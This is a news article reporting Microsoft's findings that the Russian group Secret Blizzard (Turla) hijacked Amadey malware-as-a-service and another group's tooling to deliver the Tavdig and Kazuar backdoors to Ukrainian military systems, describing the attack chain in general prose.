The Russian state-sponsored group, known as Secret Blizzard (aka Turla), has been observed utilizing malware from other threat actors to distribute the Kazuar backdoor on targeted systems in Ukraine.
A Strategic Malware Operation
The findings, revealed by the Microsoft Threat Intelligence Team, indicate that Secret Blizzard leveraged the Amadey bot malware-as-a-service (MaaS) to deliver custom malware to systems linked to the Ukrainian military. This activity, occurring between March and April 2024, represents the second recorded instance since 2022 where the group has exploited third-party cybercrime operations to execute its espionage campaigns in Ukraine.
"Commandeering other threat actors' access highlights Secret Blizzard's approach to diversifying its attack vectors," Microsoft noted in its report shared with The Hacker News.
The hacking group employs various techniques, including:
- Adversary-in-the-Middle (AitM) attacks
- Strategic web compromises (watering hole attacks)
- Spear-phishing campaigns
A History of Espionage
Secret Blizzard is known for targeting government entities, defense departments, embassies, and ministries of foreign affairs globally. The group’s primary objective is to establish long-term covert access for intelligence gathering.
Recently, Microsoft and Lumen Technologies' Black Lotus Labs uncovered another operation by Turla, where the group hijacked 33 command-and-control (C2) servers belonging to the Pakistan-based hacking group Storm-0156 to conduct its own activities.
The latest attack involved the use of Amadey bots to deploy the Tavdig backdoor, which then delivered an updated version of Kazuar. The Kazuar malware, first documented by Palo Alto Networks’ Unit 42 in November 2023, serves as a sophisticated espionage tool for reconnaissance and data exfiltration.
Leveraging Amadey Malware-as-a-Service
Secret Blizzard appears to have either purchased access to the Amadey MaaS platform or stealthily infiltrated its C2 panels. This allowed them to download a PowerShell dropper, which contained a Base64-encoded Amadey payload with additional code pointing to a Turla-controlled C2 server.
Microsoft noted that encoding the dropper with a separate C2 URL may indicate that Secret Blizzard was not directly managing Amadey’s infrastructure, suggesting a more covert operational strategy.
A Multi-Phase Attack Chain
Once deployed, the PowerShell dropper:
- Installs a reconnaissance tool to gather details about the target system, including whether Microsoft Defender is active.
- Deploys the Tavdig backdoor alongside a legitimate Symantec binary vulnerable to DLL side-loading.
- Launches the KazuarV2 malware, enabling further reconnaissance and espionage activities.
Interestingly, Microsoft also observed Secret Blizzard reusing a PowerShell backdoor linked to another Russian hacking group, Flying Yeti (aka Storm-1837/UAC-0149), to deploy Tavdig.
Obfuscation and Attribution Challenges
The investigation is ongoing to determine how Secret Blizzard gained control over Storm-1837’s infrastructure or Amadey bots to deploy its tools.
The findings emphasize Secret Blizzard’s reliance on leveraging third-party access to obscure its presence during espionage campaigns. By exploiting other actors’ infrastructure, they complicate attribution efforts and frustrate threat analysts.
"It's not uncommon for actors to use similar tools or tactics, but using another group's infrastructure is rare," said Sherrod DeGrippo, Director of Threat Intelligence Strategy at Microsoft. "This approach acts as an effective obfuscation technique, making it harder to identify the true perpetrator and preserve operational secrecy."
Conclusion
Secret Blizzard's activities underscore the evolving complexity of state-sponsored cyber operations. By commandeering third-party tools and infrastructure, the group continues to refine its strategies, posing significant challenges for cybersecurity defenders.